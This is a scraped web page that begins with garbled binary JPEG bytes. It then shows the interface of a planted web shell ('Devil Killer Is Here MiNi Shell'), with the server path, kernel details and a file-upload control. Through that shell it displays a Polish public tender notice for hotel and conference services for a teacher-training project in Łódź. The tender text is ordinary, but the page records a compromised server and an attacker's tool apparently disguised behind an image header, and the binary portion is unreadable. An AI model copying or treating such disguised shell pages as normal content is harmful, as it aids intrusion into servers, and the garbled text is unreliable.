JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221011/0038768201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> SDEZ.5.2022 Wykonanie usługi hotelowej, w tym zakwaterowania, wyżywienia, wynajmu sali konferencyjnej dla Uczestników szkolenia z zakresu doradztwa edukacyjno-zawodowego dla nauczycieli </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Łódzkie Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 471390387</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kopcińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-142</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">k.grzeszczyk@lcdnikp.elodz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wckp.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SDEZ.5.2022 Wykonanie usługi hotelowej, w tym zakwaterowania, wyżywienia, wynajmu sali konferencyjnej dla Uczestników szkolenia z zakresu doradztwa edukacyjno-zawodowego dla nauczycieli </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9b9fade8-4983-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00387682</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00123798/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa noclegowo-gastronomiczna dla uczestników szkoleń w ramach projektu „Szkolenia z zakresu doradztwa edukacyjno-zawodowego - makroregion nr II (warmiń.-mazur., mazow., łódzkie, podlaskie)”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Szkolenia z zakresu doradztwa edukacyjno-zawodowego - makroregion nr II (warmińsko-mazurskie, mazowieckie, łódzkie, podlaskie)” , nr umowy UDA-POWR.02.14.00-00-2007/18-00. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zgodnie z art. 61 ust. 1 oraz art. 63 ust. 2 Upzp, komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, przy użyciu serwisu MiniPortal<br/>https://miniportal.uzp.gov.pl (jedyny dopuszczalny sposób złożenia oferty), ePUAPu https://epuap.gov.pl/wps/portal (z wyłączeniem złożenia oferty) oraz poczty elektronicznej (z wyłączeniem złożenia oferty): k.grzeszczyk@lcdnikp.elodz.edu.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Instrukcji użytkownika systemu miniPortal dostępnej pod adresem https://miniportal.uzp.gov.pl oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia PE i RE 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych (dalej RODO) informujemy, że:<br/>1.1. Administratorem Państwa danych osobowych jest Łódzkie Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego z siedzibą w Łodzi, ul. Kopcińskiego 29; (Tel.: (42) 678-33-78; e-mail: kontakt@lcdnikp.elodz.edu.pl).<br/>1.2. W sprawach dotyczących danych osobowych można skontaktować się z Inspektorem Ochrony Danych P. Tomasz Krupa e-mail: iod@lcdnikp.elodz.edu.pl).<br/>1.3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO w związku z prowadzonym postępowaniem.<br/>1.4. Dostęp do danych osobowych posiadają upoważnieni pracownicy Łódzkiego Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego oraz upoważnione osoby zatrudnione do zarządzania projektem na podstawie umów cywilno-prawnych.<br/>1.5. Dane osobowe będą przechowywane przez okres niezbędny do realizacji wskazanego powyżej celu przetwarzania, w tym również obowiązku archiwizacyjnego wynikającego z przepisów prawa.<br/>1.6. W związku z przetwarzaniem przez Administratora danych osobowych przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania, usunięcia lub ograniczenia przetwarzania, także prawo wniesienia sprzeciwu wobec przetwarzania, a także prawo do przeniesienia danych.<br/>1.7. Mają Państwo prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>1.8. Podanie danych osobowych jest warunkiem uczestnictwa w przetargu i wynika z przepisów prawa.<br/>1.9. Pani/Pana dane nie będą poddawane zautomatyzowanemu podejmowania decyzji, ani nie będą profilowane.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą przetwarzane przez okres obowiązywania zawartej Umowy oraz po zakończeniu jej obowiązywania tej Umowy przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych Administratora w zakresie archiwizacji dokumentów, a także przez okres przedawnienia roszczeń przysługujących Administratorowi i w stosunku do niego.<br/>2. Odbiorcy danych osobowych Pani/Pana dane osobowe mogą być udostępniane innym podmiotom jeżeli obowiązek taki będzie<br/>wynikać z przepisów prawa. Do Pani/Pana danych osobowych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu (podmioty przetwarzające), np. podmioty świadczące pomoc prawną, usługi informatyczne, usługi niszczenia i archiwizacji dokumentów, jak również inni administratorzy danych osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub kurierską.<br/>3. Prawa osób, których dane dotyczą. Zgodnie z RODO przysługuje Pani/Panu:<br/>1) prawo dostępu do swoich danych osobowych i otrzymania ich kopii;<br/>2) prawo do sprostowania (poprawiania) swoich danych osobowych;<br/>3) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej;<br/>4) prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SDEZ.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie usługi hotelowej, w tym zakwaterowania, wyżywienia oraz wynajmu sal konferencyjnych lub szkoleniowych dla uczestników Projektu, w związku z realizacją usługi szkoleniowej z zakresu doradztwa edukacyjno-zawodowego – usługa ta jest przedmiotem odrębnego postępowania.<br/>2. Zamówienie przewiduje utworzenie 14 (z 41) grup Uczestników objętych usługą szkoleniową do której przypisuje się grupę około 195 osób uprawionych do skorzystania z usługi noclegu i pełnego wyżywienia (w zakresie opisanym w pkt. 2.2.1.2.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-10-28 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która spełnia postawione<br/>warunki, nie została odrzucona, nie została złożona przez Wykonawcę podlegającego wykluczeniu oraz która uzyska największą ilość punktów w oparciu o ustalone kryteria oceny ofert. Zamawiający wyznaczył kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie<br/>każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Lokalizacja Obiektu” (L)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Wydłużenie doby hotelowej – godzina wykwaterowania” (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Bezpłatne miejsca parkingowe” (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w okolicznościach o których mowa w art.<br/>108 ust. 1 pkt 1-6 (przesłanki obligatoryjne) oraz art. 109 ust. 1 pkt 4 (przesłanki fakultatywne) Upzp;<br/>2) spełniają warunki udziału w postępowaniu dotyczący zdolności technicznej i zawodowej.<br/>1.1 Zamawiający nie opisuje szczegółowo warunków udziału w postępowaniu oraz sposobu oceny spełniania warunków<br/>dotyczących:<br/>a) posiadania zdolności do występowania w obrocie gospodarczym,<br/>b) posiadania uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów,<br/>c) sytuacji ekonomicznej lub finansowej,<br/>1.2 Na potrzeby udziału w przedmiotowym postępowaniu, za wystarczające w odniesieniu do warunków o których mowa<br/>powyżej w lit. a)-d), Zamawiający uzna złożenie przez Wykonawcę własnego oświadczenia o treści potwierdzającej, iż posiada potencjał techniczny oraz że znajduje się w sytuacji ekonomicznej i finansowej w stopniu niezbędnym do prawidłowego wykonywania i ukończenia realizacji usługi zgodnie z wymogami Zamawiającego i niniejszej SWZ. Formularz wzoru oświadczenia stanowi załącznik nr 3 do SWZ.<br/>2. Warunek udziału w postępowaniu dotyczący zdolności zawodowej i technicznej – dotyczy każdej z części zamówienia,<br/>zostanie spełniony, jeżeli Wykonawca wykaże że:<br/>2.1 dysponuje lub będzie dysponował Obiektem spełniającym łącznie wszystkie opisane przez Zamawiającego warunki<br/>techniczne, jakościowe, dostępności, organizacyjne i logistyczne o których mowa w Dziale III SWZ:<br/>a) składając ofertę, Wykonawca zobowiązany jest wskazać w treści oferty (z wykorzystaniem formularza – załącznika nr 1 do SWZ) dokładną i precyzyjną informację o dysponowanym Obiekcie<br/>(podając co najmniej jego nazwę oraz pełny adres).<br/>b) składając ofertę, Wykonawca zobowiązany jest przedstawić przygotowaną przez siebie zbiorczą Informację o dysponowanym Obiekcie, w której Wykonawca przedstawi ofertę Obiektu w odniesieniu co najmniej do:<br/>- ilości i standardu dostępnych pokoi i ich wyposażenia (patrz SWZ Dział III pkt. 4.3.),<br/>- ilości i standardu dostępnych sal konferencyjnych/szkoleniowych i ich wyposażenia (patrz SWZ Dział III pkt. 4.7.)<br/>- dostępności Obiektu w formie wstępnego Harmonogramu (patrz SWZ Dział III pkt. 3.2. i ppkt. 3.2.1.) przy czym Informacja ta stanowi przedmiotowy środek dowodowy, o którym mowa w Dziale XV pkt. 1 lit. a) SWZ.<br/>c) składając ofertę, Wykonawca zobowiązany jest przedstawić Zobowiązanie właściciela lub zarządcy (będącego w tym<br/>przypadku podmiotem udostępniającym zasoby celem wykazania przez Wykonawcę spełniania warunku udziału w postępowaniu) Obiektu wskazanego przez Wykonawcę (do realizacji przedmiotowej usługi) o oddaniu tej nieruchomości na potrzeby świadczenia usługi przez Wykonawcę – chyba, że Wykonawca posiada odpowiedni tytuł prawny do tej nieruchomości (w zakresie gwarantującym prawo do dysponowania nią w zakresie obejmującym złożenie oferty i świadczenie przedmiotowej usługi) przy czym Zobowiązanie to stanowi przedmiotowy środek dowodowy, o którym mowa w Dziale XII pkt. 2 SWZ oraz w Dziale XV pkt. 1 lit. b) SWZ.<br/>2.2	wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej trzy usługi tożsame z przedmiotem zamówienia tj. z których każda obejmowała/obejmuje:<br/>a) świadczenie usługi hotelarskiej (CPV dla odniesienia: 55110000-4 Hotelarskie usługi noclegowe) dla zorganizowanej grupy osób liczącej co najmniej 15 osób wraz z usługą restauracyjną/gastronomiczną (CPV dla odniesienia: 55300000-3 Usługi restauracyjne i dotyczące podawania posiłków) polegającej na serwowaniu wyżywienia lub podawania w formie bufetu samoobsługowego minimum w zakresie śniadań,<br/>b) świadczenie usług konferencyjnych (CPV dla odniesienia:55120000-7 Usługi hotelarskie w zakresie spotkań i konferencji) dla zorganizowanej grupy osób liczącej co najmniej 15 osób,<br/>3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie, w celu spełnienia warunku udziału w postępowaniu<br/>dotyczącego zdolności zawodowej, Wykonawcy mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, stanowiące załącznik nr 3 do SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4. Zamawiający dokona oceny spełniania przez Wykonawców warunku udziału w postępowaniu na podstawie informacji<br/>zawartych w oświadczeniach i dokumentach wymienionych w Rozdziale XIV i XV SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">A. DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>1. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego w<br/>okolicznościach o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 Upzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, Wykonawca dołącza do oferty aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Upzp dotyczące przesłanek wykluczenia z postępowania, którego wzór stanowi załącznik nr 2 do SWZ.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w pkt. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu<br/>B. DOKUMENTY SKŁADANE PO OTWARCIU OFERT:<br/>1. Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających:<br/>1) brak podstaw wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 108 i 109 Upzp tj.:<br/>a) art. 108 ust. 1 pkt 5 Upzp - oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej z innym wykonawcą,<br/>który złożył odrębną ofertę lub ofertę częściową.<br/>b) art. 109 ust. 1 pkt 4 Upzp – odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Upzp,<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty, o których mowa<br/>w powyższym punkcie składa każdy z nich.<br/>1.1). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 1 ppkt. 1 lit. b), składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, że jego działalność gospodarcza nie jest zawieszona ani że nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu ich złożenia.<br/>1.2) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.<br/>1 ppkt. 1 lit. b), lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 109 ust. 1 pkt 4 Upzp<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego 